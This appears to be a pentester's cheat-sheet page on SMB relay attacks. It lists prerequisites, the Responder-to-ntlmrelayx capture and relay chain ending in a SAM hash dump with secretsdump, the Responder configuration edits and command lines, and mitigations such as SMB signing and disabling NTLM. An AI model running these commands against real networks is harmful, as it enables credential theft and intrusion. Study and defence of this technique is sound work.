smb relay ntlmrelayx
REQUIREMENTS:
SMB signing must be disabled.
Relayed user creds must be admin on machine
Information
Invoke this attack: request callback to SMB on kali using \\IP
responder
will capture the request, pass it tontlmrelayx
ntlmrelayx will relay the request to TARGET.txt
Enables RemoteRegistry
Captures system bootkey
Performs intended action; Default action: SAM dump using
secretsdump.py
Retores RemoteRegistry back to disabled state.
SMB-check
Method:
set
SMB=Off
andHTTP=Off
in/etc/responder/Responder.conf
Run
sudo responder -I INTF -rdwv
Run
ntlmrelayx.py -tf TARGET.txt -smb2support [FLAGS]
Fix
Enable SMB signing on all devices (can cause performance issues).
Disable NTLM Auth on network
Account tiering (restricting domain admins to specific tasks)
Last updated